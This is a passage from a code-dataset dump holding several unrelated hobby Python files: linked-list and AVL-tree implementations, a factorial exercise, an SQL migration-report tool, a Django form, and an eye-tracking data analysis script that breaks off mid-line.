tracker.next\n\t\t\ttracker.next = new_node\n\t\t\tself.tail = new_node\n\n\n\tdef insert(self, previous_val, new_val):\n\t\t#Insert: given the previous node, insert a new node\n\t\t\n\t\tin_node = Node(new_val)\n\n\t\t#Move through the linked list, searching for previous value in node data fields\n\t\t#If we find a match, we can change the links, thus inserting the new node\n\t\tmover = self.head\n\t\twhile mover.next != None:\n\t\t\tif mover.data == previous_val:\n\t\t\t\tin_node.next = mover.next\n\t\t\t\tmover.next = in_node\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tmover = mover.next\n\n\t\t#Make sure to check the value of the last node\n\t\tif mover.data == previous_val:\n\t\t\tin_node.next = mover.next\n\t\t\tmover.next = in_node\n\t\t\treturn\n\t\telse:\n\t\t\tprint(\"Invalid 'previous value' input.\")\n\n\n\tdef delete(self, val):\n\t\t#Given a data value, delete the node from the linked list\n\n\t\tif self.head == None:\n\t\t\tprint(\"This list is already empty!\")\n\t\t\treturn\n\n\t\telif self.head.data == val:\n\t\t\tprint(f\"Deleting {val} from Linked List.\")\n\t\t\tself.head = None\n\t\t\treturn\n\n\t\ttracker = self.head\n\n\t\twhile tracker.next != None:\n\t\t\tif tracker.next.data == val:\n\t\t\t\t#Delete the node by undoing its link to previous node\n\t\t\t\t#Account for the case where desired deletion is the tail.\n\t\t\t\tif tracker.next != self.tail:\n\t\t\t\t\tnext_node = 
tracker.next\n\t\t\t\t\ttracker.next = next_node.next\n\t\t\t\telse:\n\t\t\t\t\ttracker.next = None\n\t\t\t\t\tself.tail = tracker\n\t\t\t\tprint(f\"Deleting {val} from Linked List.\")\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\ttracker = tracker.next\n\n\tdef pop_list(self):\n\t\t#Remove the last element of the linked list\n\n\t\ttracker = self.head\n\t\tahead = tracker.next\n\n\t\twhile ahead.next != None:\n\t\t\ttracker = ahead\n\t\t\tahead = ahead.next\n\t\ttracker.next = None\n\t\tself.tail = tracker\n\n\n\tdef print_list(self):\n\t\t#print the contents of the linked list in order\n\n\t\t#Move through the linkedlist, printing data values\n\t\tplotter = self.head\n\t\twhile plotter.next != None:\n\t\t\tprint(plotter.data)\n\t\t\tplotter = plotter.next\n\t\t#Print the last node's data\n\t\tprint(plotter.data)\n\n\n\"\"\"test = linkedList()\ntest.add_to_tail(5)\ntest.add_to_tail(10)\ntest.insert(10, 15)\ntest.add_to_tail(20)\ntest.print_list()\ntest.delete(20)\ntest.print_list()\"\"\"","repo_name":"michaelsolimano16/linked-list","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32261617741","text":"'''\nYou have been given a positive integer N.\nYou need to find and print the Factorial of this number.\n'''\n\nn = int(input(\"Enter number to find it's factorial:\"))\n\nfact = 1\n\ni = n\nwhile i>0:\n fact *= i\n i -= 1\nprint(f\"Factorial of {n} = {fact}\")","repo_name":"Shashankhs17/Hackereath-problems_python","sub_path":"Basic/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45768045866","text":"import pyodbc\nimport pandas as pd\nimport os\nfrom pathlib import Path\nimport datetime\nimport sys\n\n\ndef main():\n print(\"************************************************\")\n print(\" ArchiveMUSH V1.0 - The ArchiveMASH Assistant\")\n print(\"************************************************\")\n\n # Gather SQL Server and DB Name used by ArchiveMASH (Assume we're using the current Windows login creds).\n while True:\n try:\n server_name = input(\"Enter the SQL Server name: \")\n DBName = input(\"Enter the name of the ArchiveMASH database: \")\n # server_name = 'evdasql2016'\n # DBName = 'archivem'\n # Connect to the SQL server\n conn = pyodbc.connect(\n 'Driver={SQL Server};'\n 'Server=' + server_name + ';'\n 'Database=' + DBName + ';'\n 'Trusted_Connection=yes;'\n )\n #'Driver={ODBC Driver 17 for SQL Server};Server=' + server_name + ';Database=' + DBName + ';Trusted_Connection=yes;')\n except:\n print('Connection Unsuccessful.', sys.exc_info()[0])\n continue\n\n else:\n print(f'Connected to {server_name}.')\n break\n\n # Provide list of reports and ask for selection.\n main_menu = ['Migration Status Report', 'Migration Rate Report', 'Change Migration Status']\n user_id = None\n group_id = None\n user_name = \"\"\n\n selection = None\n while not selection:\n selection = get_menu_option(main_menu, \"#########Main Menu#########\")\n\n if selection == 'Migration Rate Report':\n group_selection = None\n group_query = 'SELECT GroupName from Users GROUP BY GroupName'\n group_list = run_simple_query(group_query, conn)\n while not group_selection:\n group_selection = get_menu_option(group_list, \"Specify Migration Group:\")\n group_id = group_selection[0]\n yes_no = ''\n while yes_no.lower() not in ('y', 
'n'):\n yes_no = input('Do you want to run report for a single user? (Y/N): ')\n if yes_no.lower() not in ('y', 'n'):\n print('Invalid Entry. Try again.')\n\n if yes_no.lower() == 'y':\n user_selection = None\n user_query = \"SELECT UserId, DisplayName FROM users where GroupName = '\" + group_id + \"'\"\n user_list = run_simple_query(user_query, conn)\n while not user_selection:\n user_selection = get_menu_option(user_list, \"Select User: \")\n user_id = user_selection[0]\n user_name = user_selection[1]\n\n # Run selected report.\n sql_run = get_report(selection)\n run_report(sql_run, selection, conn, group_id, user_id, user_name)\n\n\ndef run_report(report_file, name, conn, group_id, user_id,\n user_name): # Function loads and runs report from SQL query file.\n query_text = load_query(report_file)\n query_change = \"\"\n # If there's a userID or GroupID limiter in the query, add those.\n if group_id != None:\n for line in query_text:\n stripped_line = line.strip()\n new_line = stripped_line\n if stripped_line.find(\"<GROUP_ID>\") != -1:\n new_line = stripped_line.replace(\"<GROUP_ID>\", group_id)\n elif (stripped_line.find(\"u.UserID > 0\") != -1 and user_id != None):\n user_text = 'u.UserID = ' + str(user_id)\n new_line = stripped_line.replace(\"u.UserID > 0\", user_text)\n query_change += new_line + \"\\n\"\n query_text = query_change\n query_change = \"\"\n stripped_line = \"\"\n new_line = \"\"\n\n # take the text pulled from the query file and run it.\n with conn.cursor():\n report_query = ''.join(query_text)\n # print(report_query)\n # input()\n if group_id != None:\n content = \"Group: \" + group_id + \" \"\n if user_name != \"\":\n content += \"User: \" + user_name + \"\\n\"\n content = pd.read_sql_query(report_query, conn)\n\n print()\n print(content)\n # Print report to file.\n header_text = write_header(name, group_id, user_name)\n write_report(name, content, header_text)\n\n\n# Show completion status and present location of report.\n\n\ndef create_report(file_name): # function creates a report file and directory.\n file_name = file_name + datetime.datetime.now().strftime(\"-%m-%d-%Y_%H%M%S.csv\")\n parent_dir = os.path.dirname(__file__)\n path = os.path.join(parent_dir, \"Reports\")\n if not os.path.isdir(path):\n os.mkdir(path)\n abs_file = os.path.join(path, file_name)\n return abs_file\n\n\ndef write_header(report_name, group_id, user_name):\n header_text = report_name + \"\\n \\n\"\n if (report_name == 'Migration Rate Report'):\n header_text += \"Group: \" + group_id\n if user_name != \"\":\n header_text += \" ,User: \" + user_name + \"\\n \\n\"\n else:\n header_text += \"\\n \\n\"\n header_text += \"Start Time, Stop Time, Minutes Elapsed \\n\"\n elif (report_name == 'Migration Status Report'):\n header_text += \"Group Name, Archive Name, Archive ID, Status, # Migrated, # Not Migrated, # Failed, MB Migrated \\n\"\n return header_text\n\n\ndef write_report(name, content, header_text): # function writes data to the report file.\n filename = create_report(name)\n content.to_csv(filename, index=False, header=True)\n with open(filename) as lines:\n line = lines.readlines()\n\n line[0] = header_text\n\n with open(filename, \"w\") as lines:\n lines.writelines(line)\n\n\ndef load_query(file_name): # function loads the specified SQL query to be run.\n abs_file = os.path.abspath(os.path.join(\"lib\", file_name))\n query = open(abs_file, 'r')\n return query\n\n\ndef run_simple_query(query, conn):\n output = pd.read_sql_query(query, conn)\n menu_list = output.values.tolist()\n # 
print(menu_list)\n # stop = input('')\n # for row in cursor:\n # menu_list.append(row)\n return menu_list\n\n\ndef get_menu_option(mlist, mname):\n print(mname)\n for index, opt in enumerate(mlist, start=1):\n print(f\"{index}: {opt}\")\n try:\n user_input: int = int(input(\"Selection: \"))\n user_input -= 1\n print(mlist[user_input])\n if user_input < 0 or user_input >= len(mlist):\n print(f\"{user_input} is an invalid entry. Try again.\")\n return None\n except ValueError as ve:\n print(f\"Could not convert {ve} to an integer. Try again.\")\n return None\n\n return mlist[user_input]\n\n\ndef get_report(report_name):\n reports = {\n \"Migration Status Report\": \"MigrationStatus.sql\",\n \"Migration Rate Report\": \"MigPerformance.sql\"\n }\n sql_run = reports.get(report_name)\n return sql_run\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jajensen34/ArchiveMASHReporter","sub_path":"ArchiveMASH_Reporter/ArchiveMASH_Reporter.py","file_name":"ArchiveMASH_Reporter.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36913109253","text":"from django import forms\nfrom menu_maker.models import MenuItem\n\n\nclass MenuItemForm(forms.ModelForm):\n position = forms.IntegerField(\n initial=-1,\n min_value=-1,\n help_text=\"0-based position amoung children, with -1 to insert last\",\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n position = self.instance.get_position()\n if position:\n self.fields[\"position\"].initial = position[0] - 1\n\n def save(self, commit: bool = True):\n input_pos = self.cleaned_data[\"position\"]\n self.instance.set_new_position(input_pos)\n return super().save(commit)\n\n class Meta:\n model = MenuItem\n exclude = [\"lft\", \"rgt\"]\n","repo_name":"Gvard-Windlass/uptrader_task","sub_path":"menu_maker/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29430212687","text":"import numpy as np\nimport pandas as pd\nfrom .adjustfather import AdjustFather\n\n\nclass InverseAdjust(AdjustFather):\n def __init__(self):\n self.t_num = 1\n\n\nclass DxwInverseAdjust(InverseAdjust):\n def __init__(self, dxw):\n # super().__init__()\n self.n_num_corner = len(dxw.corners)\n self.n_num_edge = len(dxw.edges)\n self.n_num = self.n_num_edge + self.n_num_corner\n self.t_num = len(dxw.params_xy['origin_xy'])\n self.known_num = len(dxw.known_poi)\n self.t_num_half = int(self.t_num / 2)\n\n","repo_name":"zy6p/adjust","sub_path":"pc/inverseadjust.py","file_name":"inverseadjust.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26200020334","text":"from no import No\r\nimport tkinter as tk\r\nfrom tkinter import font, IntVar\r\n\r\n\r\nclass Arvore:\r\n\r\n def __init__(self, valor=None) -> None:\r\n\r\n self.raiz = None\r\n\r\n # Função pra adicionar um elemto na arvore\r\n\r\n def add(self, valor):\r\n\r\n # adicionar elemento em uma arvore vazia\r\n if self.raiz == None:\r\n self.raiz = No(valor)\r\n\r\n # adicionar elemento em uma arvore que não está vazia\r\n else:\r\n no = No(valor)\r\n raiz = self.raiz\r\n raiz = self.procurar_add(no.valor, raiz)\r\n\r\n if no.valor < raiz.valor:\r\n raiz.esquerda = no\r\n else:\r\n raiz.direita = no\r\n\r\n self.pecorrer_balancear()\r\n\r\n # procura o nó que será adicionado o 
novo elemento\r\n def procurar_add(self, valor, raiz=None):\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor < raiz.valor:\r\n\r\n if raiz.esquerda != None:\r\n\r\n raiz = self.procurar_add(valor, raiz.esquerda)\r\n else:\r\n if raiz.direita != None:\r\n raiz = self.procurar_add(valor, raiz.direita)\r\n\r\n return raiz\r\n\r\n def procurar(self, valor, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor > raiz.valor:\r\n if raiz.direita != None:\r\n raiz = self.procurar(valor, raiz.direita)\r\n elif valor < raiz.valor:\r\n if raiz.esquerda != None:\r\n raiz = self.procurar(valor, raiz.esquerda)\r\n\r\n if valor == raiz.valor:\r\n return raiz\r\n\r\n # procura a sub-arvore para apagar ate encontrar o valor que quer apagar\r\n\r\n def remover(self, valor, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if valor < raiz.valor:\r\n raiz.esquerda = self.remover(valor, raiz.esquerda)\r\n\r\n elif valor > raiz.valor:\r\n raiz.direita = self.remover(valor, raiz.direita)\r\n\r\n else:\r\n\r\n # Se o elemento for uma folha\r\n if raiz.esquerda == None and raiz.direita == None:\r\n if raiz == self.raiz:\r\n self.raiz = None\r\n return None\r\n\r\n # Se o elemento tiver somente filho no lado esquerdo\r\n elif raiz.esquerda != None and raiz.direita == None:\r\n if raiz == self.raiz:\r\n self.raiz = raiz.esquerda\r\n return raiz.esquerda\r\n\r\n # Se o elemento tiver somente filho no lado direito\r\n elif raiz.esquerda == None and raiz.direita != None:\r\n if raiz == self.raiz:\r\n self.raiz = raiz.direita\r\n return raiz.direita\r\n\r\n # Se o elemento tiver dois filhos\r\n else:\r\n menor = self.menor(raiz.direita)\r\n raiz.valor = menor.valor\r\n raiz.direita = self.remover(menor.valor, raiz.direita)\r\n\r\n self.pecorrer_balancear()\r\n return raiz\r\n\r\n def pre_ordem(self, raiz=None):\r\n if raiz == None:\r\n print('Pre-Ordem: ', end=\"\")\r\n raiz = self.raiz\r\n\r\n print(raiz.valor, end=\" \")\r\n\r\n if raiz.esquerda != None:\r\n self.pre_ordem(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n self.pre_ordem(raiz.direita)\r\n\r\n def ordem(self, raiz=None):\r\n\r\n if raiz == None:\r\n print('Em Ordem:', end=' ')\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n self.ordem(raiz.esquerda)\r\n\r\n print(raiz.valor, end=' ')\r\n\r\n if raiz.direita != None:\r\n self.ordem(raiz.direita)\r\n\r\n def pecorrer_balancear(self, raiz=None):\r\n\r\n if raiz == None:\r\n\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n self.pecorrer_balancear(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n self.pecorrer_balancear(raiz.direita)\r\n\r\n self.balancear(raiz)\r\n\r\n def menor(self, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n return self.menor(raiz.esquerda)\r\n\r\n if raiz.esquerda == None:\r\n return raiz\r\n\r\n def maior(self, raiz=None):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.direita != None:\r\n return self.maior(raiz.direita)\r\n\r\n if raiz.direita == None:\r\n return raiz\r\n\r\n def quantidade_no(self, raiz=None, cont=1):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda != None:\r\n cont += 1\r\n cont = self.quantidade_no(raiz.esquerda, cont)\r\n\r\n if raiz.direita != None:\r\n cont += 1\r\n cont = self.quantidade_no(raiz.direita, cont)\r\n\r\n return cont\r\n\r\n def altura(self, raiz=None, cont_esquerda=0):\r\n\r\n if raiz == None:\r\n raiz = self.raiz\r\n\r\n if raiz.esquerda is None and raiz.direita is None:\r\n cont = 1\r\n 
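# a leaf node contributes height 1\r\n 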
return cont\r\n\r\n if raiz.esquerda is not None:\r\n\r\n cont = self.altura(raiz.esquerda) + 1\r\n cont_esquerda = cont\r\n\r\n if raiz.direita is not None:\r\n\r\n cont = self.altura(raiz.direita, cont_esquerda) + 1\r\n\r\n if cont_esquerda > cont:\r\n return cont_esquerda\r\n\r\n return cont\r\n\r\n def balancear(self, raiz):\r\n\r\n tamanho_esquerda = 0\r\n tamanho_direita = 0\r\n\r\n if raiz.esquerda != None:\r\n\r\n tamanho_esquerda = self.altura(raiz.esquerda)\r\n\r\n if raiz.direita != None:\r\n\r\n tamanho_direita = self.altura(raiz.direita)\r\n\r\n raiz.fator = tamanho_esquerda - tamanho_direita\r\n\r\n if raiz.fator > 1 and raiz.esquerda.fator == 1:\r\n\r\n self.rotacao_direita(raiz)\r\n\r\n elif raiz.fator < -1 and raiz.direita.fator == -1:\r\n\r\n self.rotacao_esquerda(raiz)\r\n\r\n elif raiz.fator == 2 and (raiz.esquerda.fator == -1 or raiz.esquerda.fator == 0):\r\n\r\n self.rotacao_esquerda(raiz.esquerda)\r\n self.rotacao_direita(raiz)\r\n\r\n elif raiz.fator == -2 and (raiz.direita.fator == 1 or raiz.direita.fator == 0):\r\n\r\n self.rotacao_direita(raiz.direita)\r\n self.rotacao_esquerda(raiz)\r\n\r\n def rotacao_direita(self, raiz):\r\n\r\n raiz.valor, raiz.esquerda.valor = raiz.esquerda.valor, raiz.valor\r\n esquerda_raiz = raiz.esquerda\r\n raiz.esquerda = raiz.esquerda.esquerda\r\n direita = raiz.direita\r\n raiz.direita = esquerda_raiz\r\n raiz.direita.esquerda = raiz.direita.direita\r\n raiz.direita.direita = direita\r\n\r\n def rotacao_esquerda(self, raiz):\r\n\r\n raiz.valor, raiz.direita.valor = raiz.direita.valor, raiz.valor\r\n direita_raiz = raiz.direita\r\n raiz.direita = raiz.direita.direita\r\n esquerda = raiz.esquerda\r\n raiz.esquerda = direita_raiz\r\n raiz.esquerda.direita = raiz.esquerda.esquerda\r\n raiz.esquerda.esquerda = esquerda\r\n\r\n def exibir_arvore(self, raiz=None):\r\n\r\n def adicionar_arvore():\r\n\r\n valor = int(caixa_entrada.get())\r\n self.add(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n informacoes()\r\n\r\n def remover_arvore():\r\n\r\n valor = int(caixa_entrada.get())\r\n self.remover(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n informacoes()\r\n\r\n def informacoes():\r\n\r\n altura_var.set(self.altura())\r\n maior_var.set(self.maior().valor)\r\n menor_var.set(self.menor().valor)\r\n quantidade_var.set(self.quantidade_no())\r\n\r\n def mostrar_no():\r\n\r\n valor = int(caixa_entrada.get())\r\n no_buscado = self.procurar(valor)\r\n canvas.delete(\"all\")\r\n raiz = self.raiz\r\n desenhar_no(raiz, 680, 50, 200, 100, no_buscado)\r\n informacoes()\r\n\r\n # Função auxiliar para desenhar os nós da árvore\r\n\r\n def desenhar_no(no, x, y, dx, dy, no_buscado=None):\r\n\r\n raio = 18\r\n cor = \"#f2f2f2\"\r\n cor_texto = \"black\"\r\n\r\n if no is not None:\r\n espessura_borda = 2\r\n if no_buscado == no:\r\n cor = \"#ff4A4a\"\r\n cor_texto = \"#f2f2f2\"\r\n canvas.create_oval(x - raio, y - raio, x + raio,\r\n y + raio, fill=cor, width=espessura_borda)\r\n canvas.create_text(x, y, text=(str(no.valor)),\r\n font='bold', fill=cor_texto)\r\n\r\n if no.esquerda:\r\n canvas.create_line(x, y + raio, x - dx,\r\n y + dy - raio, width=2)\r\n desenhar_no(no.esquerda, x - dx, y +\r\n dy, dx/2, dy, no_buscado)\r\n if no.direita:\r\n canvas.create_line(x, y + raio, x + dx,\r\n y + dy - raio, width=2)\r\n desenhar_no(no.direita, x + dx, y +\r\n dy, dx/2, dy, no_buscado)\r\n\r\n raiz = self.raiz\r\n\r\n janela = tk.Tk()\r\n 
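# GUI layout: tree canvas on top, info labels (height, largest, smallest, node count) at the left, entry box and Procurar/Remover/Adicionar buttons below\r\n 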
janela.configure(bg='#0a0c0d')\r\n font_grande = font.Font(size=16)\r\n font_padrao = font.Font(size=15)\r\n\r\n altura_var = IntVar()\r\n maior_var = IntVar()\r\n menor_var = IntVar()\r\n quantidade_var = IntVar()\r\n altura_var.set(0)\r\n maior_var.set(0)\r\n menor_var.set(0)\r\n quantidade_var.set(0)\r\n\r\n titulo = tk.Label(janela, text='Árvore binária de busca balanceada',\r\n font=font_grande, fg='#f2f2f2', bg='#3d3334').pack(side='top')\r\n\r\n # Criação da janela e do canvas\r\n canvas = tk.Canvas(janela, width=1350, height=800, bg=\"#348e91\")\r\n canvas.pack(side='top')\r\n\r\n # Desenhar a árvore\r\n desenhar_no(raiz, 680, 50, 200, 100)\r\n\r\n tex1 = tk.Label(janela, text='Altura da árvore: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=50)\r\n altura = tk.Label(janela, textvariable=altura_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=160, y=50)\r\n tex2 = tk.Label(janela, text='Maior valor: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=80)\r\n maior = tk.Label(janela, textvariable=maior_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=130, y=80)\r\n tex3 = tk.Label(janela, text='Menor valor: ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=110)\r\n menor = tk.Label(janela, textvariable=menor_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=130, y=110)\r\n tex4 = tk.Label(janela, text='Quantidade de nó(s): ', bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=10, y=140)\r\n quantidade = tk.Label(janela, textvariable=quantidade_var, bg=\"#348e91\",\r\n font=font_padrao, fg=\"#f2f2f2\").place(x=205, y=140)\r\n\r\n procurar = tk.Button(janela, text='Procurar', command=mostrar_no,\r\n bg='blue', fg='#f2f2f2', font=('Arial', 13), width=8).place(x=550, y=625)\r\n remover = tk.Button(janela, text='Remover', command=remover_arvore,\r\n bg='red', fg='#f2f2f2', font=('Arial', 13), width=8).place(x=638, y=625)\r\n adicionar = tk.Button(janela, text='Adicionar', command=adicionar_arvore,\r\n bg='#1c5052', fg='#f2f2f2', font=('Arial', 13)).place(x=724, y=625)\r\n caixa_entrada = tk.Entry(janela, bg='#f2f2f2', font=(\r\n 'Arial', 16), justify='center', width=21)\r\n caixa_entrada.place(x=550, y=590)\r\n\r\n # Executar a janela\r\n janela.mainloop()\r\n","repo_name":"Fabricio-Andrade-Sousa/arvore-binaria-de-busca","sub_path":"arvore_binaria.py","file_name":"arvore_binaria.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42069637503","text":"import scipy.io as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport os\nfrom collections import defaultdict\nfrom usefulFns import *\n\nallTrialsData, header = loadMatFile('Meetz_2021_1028_1.mat')\n\n\n\n# code to check whether valid RT are being rewarded or not\n# check EOT to make sure that trialEnd is not including 'wrong/distracted' \ncorrecttNoRwrd = []\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n trial = currTrial['trial'].item()['data'].item()\n if extendedEOT == 6 and fieldInTrial(['reactTimeMS'], currTrial):\n reactTimeMS = currTrial['reactTimeMS'].item()['data'].item()\n if reactTimeMS > 0 and reactTimeMS < 500:\n correcttNoRwrd.append(n)\n\n# List of trials with early's but Target appears on screen\nRTs = []\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n trial = 
currTrial['trial'].item()['data'].item()\n extendedEOT = currTrial['extendedEOT'].item()['data'].item()\n if extendedEOT == 6 and fieldInTrial(['targetOn'], currTrial):\n RTs.append(n)\n\n# trial RTs with early's but Target appears on screen\nearlyWithRT = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n if extendedEOT == 6 and fieldInTrial(['targetOn', 'reactTimeMS'], currTrial):\n earlyWithRT.append((n, currTrial['reactTimeMS'].item()['data'].item()))\n\n# correct trials with short RT\ncorrectShortRT = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n trial = currTrial['trial'].item()['data'].item()\n if extendedEOT == 0 and trial['catchTrial'] != 1:\n reactTimeMS = currTrial['reactTimeMS'].item()['data'].item()\n if reactTimeMS <100:\n correctShortRT.append((n, reactTimeMS))\n\n# EyePos for a trial\ncurrTrial = allTrialsData.item()[0][i]\neyesXYDeg = defaultdict(list)\neyeLX = currTrial['eyeLXData'].item()['data'].item() \neyeLY = currTrial['eyeLYData'].item()['data'].item()\neyeRX = currTrial['eyeRXData'].item()['data'].item()\neyeRY = currTrial['eyeRYData'].item()['data'].item()\neyeLeftCal = currTrial['eyeLeftCalibrationData'].item()['data'].item()['cal'].item()\neyeRightCal = currTrial['eyeRightCalibrationData'].item()['data'].item()['cal'].item()\ncount = min([len(eyeLX), len(eyeLY), len(eyeRX), len(eyeRY)])\n\nfor s in range(0, count):\n xDegConvert = (eyeLX[s] * eyeLeftCal['m11'].item()) + (eyeLY[s] * eyeLeftCal['m21'].item()) + eyeLeftCal['tX'].item()\n eyesXYDeg['leftX'].append(xDegConvert)\n yDegConvert = (eyeLX[s] * eyeLeftCal['m12'].item()) + (eyeLY[s] * eyeLeftCal['m22'].item()) + eyeLeftCal['tY'].item()\n eyesXYDeg['leftY'].append(yDegConvert)\n xDegConvert = (eyeRX[s] * eyeRightCal['m11'].item()) + (eyeRY[s] * eyeRightCal['m21'].item()) + eyeRightCal['tX'].item()\n eyesXYDeg['rightX'].append(xDegConvert)\n yDegConvert = (eyeRX[s] * eyeRightCal['m12'].item()) + (eyeRY[s] * eyeRightCal['m22'].item()) + eyeRightCal['tY'].item()\n eyesXYDeg['rightY'].append(yDegConvert)\n\n# EyePos for a list of trials indexes\neyePosDurTarget = []\nfor i in correctShortRT:\n trialNumber, reactTime = i\n currTrial = allTrialsData.item()[0][trialNumber]\n leftXDeg = []\n leftYDeg = []\n rightXDeg = []\n rightYDeg = []\n eyeLX = currTrial['eyeLXData'].item()['data'].item() \n eyeLY = currTrial['eyeLYData'].item()['data'].item()\n eyeRX = currTrial['eyeRXData'].item()['data'].item()\n eyeRY = currTrial['eyeRYData'].item()['data'].item()\n eyeLeftCal = currTrial['eyeLeftCalibrationData'].item()['data'].item()['cal'].item()\n eyeRightCal = currTrial['eyeRightCalibrationData'].item()['data'].item()['cal'].item()\n\n count = min([len(eyeLX), len(eyeLY), len(eyeRX), len(eyeRY)])\n for l in range(0, count):\n xDegConvert = (eyeLX[l] * eyeLeftCal['m11'].item()) + (eyeLY[l] * eyeLeftCal['m21'].item()) + eyeLeftCal['tX'].item()\n leftXDeg.append(xDegConvert)\n yDegConvert = (eyeLX[l] * eyeLeftCal['m12'].item()) + (eyeLY[l] * eyeLeftCal['m22'].item()) + eyeLeftCal['tY'].item()\n leftYDeg.append(yDegConvert)\n # for r in range(0, count):\n xDegConvert = (eyeRX[l] * eyeRightCal['m11'].item()) + (eyeRY[l] * eyeRightCal['m21'].item()) + eyeRightCal['tX'].item()\n rightXDeg.append(xDegConvert)\n yDegConvert = (eyeRX[l] * eyeRightCal['m12'].item()) + (eyeRY[l] * eyeRightCal['m22'].item()) + eyeRightCal['tY'].item()\n rightYDeg.append(yDegConvert)\n\n fixate = 
currTrial['fixate'].item()['timeMS'].item()\n trialStart = currTrial['trialStart'].item()['timeMS'].item()\n fixateTimeWRTEyePos = math.floor((fixate - trialStart)/2)\n fixateTimeForIndex = fixateTimeWRTEyePos\n windowWidth = currTrial['fixWindowData'].item()['data'].item()['windowDeg'].item()['size'].item()['width'].item()\n windowHeight = currTrial['fixWindowData'].item()['data'].item()['windowDeg'].item()['size'].item()['height'].item()\n for index, xDeg in enumerate(leftXDeg[fixateTimeWRTEyePos:]):\n if -(windowWidth/2) > xDeg or xDeg > (windowWidth/2) or -(windowHeight/2) > leftYDeg[fixateTimeForIndex] or leftYDeg[fixateTimeForIndex] > (windowHeight/2):\n eyePosSac = index + fixateTimeWRTEyePos\n break\n else:\n fixateTimeForIndex += 1\n eyePosSacTimeMS = eyePosSac * 2\n saccadeTime = currTrial['saccade'].item()['timeMS'].item()\n diff = (saccadeTime - trialStart) - eyePosSacTimeMS\n \n targetOn = currTrial['targetOn']['timeMS']\n eyePosReactTime = eyePosSacTimeMS - (targetOn - trialStart)\n eyePosDurTarget.append((trialNumber, eyePosReactTime))\n knotRTSaccTarget = saccadeTime - targetOn\n targetOnTimeEyePos = (targetOn - trialStart)/2\n\n plt.figure()\n plt.plot(leftXDeg, color = 'olive')\n plt.plot(leftYDeg, color = 'green')\n plt.plot(rightXDeg, color = 'blue')\n plt.plot(rightYDeg, color = 'red')\n plt.axvline(x = targetOnTimeEyePos)\n plt.title(eyePosReactTime)\n\n# scatter plot RTs aligned with targetOnset\nfor y,x in eyePosDurTarget:\n plt.scatter(x,y) \nplt.axvline(x=0)\n\n# scatter plot of trialOutcomes \nfor n,outcome in enumerate(trialOutcomes):\n if outcome == 0:\n color = 'green'\n elif outcome == 6:\n color = 'orange'\n else:\n color = 'blue'\n plt.scatter(n, outcome, c = color, s = 0.5)\nfor x_axis in catchTrials:\n plt.axvline(x = x_axis, color = 'pink')\nfor x_axis in invalidTrials:\n plt.axvline(x = x_axis, color = 'black')\nplt.show()\n\n'''\nOR\n'''\nfor n,currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data'].item()\n if extendedEOT == 0:\n plt.scatter(n+1,extendedEOT, color = 'green')\n elif extendedEOT == 6:\n plt.scatter(n+1, extendedEOT, color = 'orange')\n else:\n plt.scatter(n+1, extendedEOT, color = 'blue')\nplt.show()\n\n# diff in the len of the stimOn and stimOff list\nstimDiff = []\nfor currTrial in allTrialsData.item()[0]:\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1:\n if fieldInTrial(['stimulusOn', 'stimulusOff'], currTrial): \n stimulusOn = currTrial['stimulusOn'].item()['timeMS'].item()\n stimulusOff = currTrial['stimulusOff'].item()['timeMS'].item()\n if type(stimulusOn) == int:\n 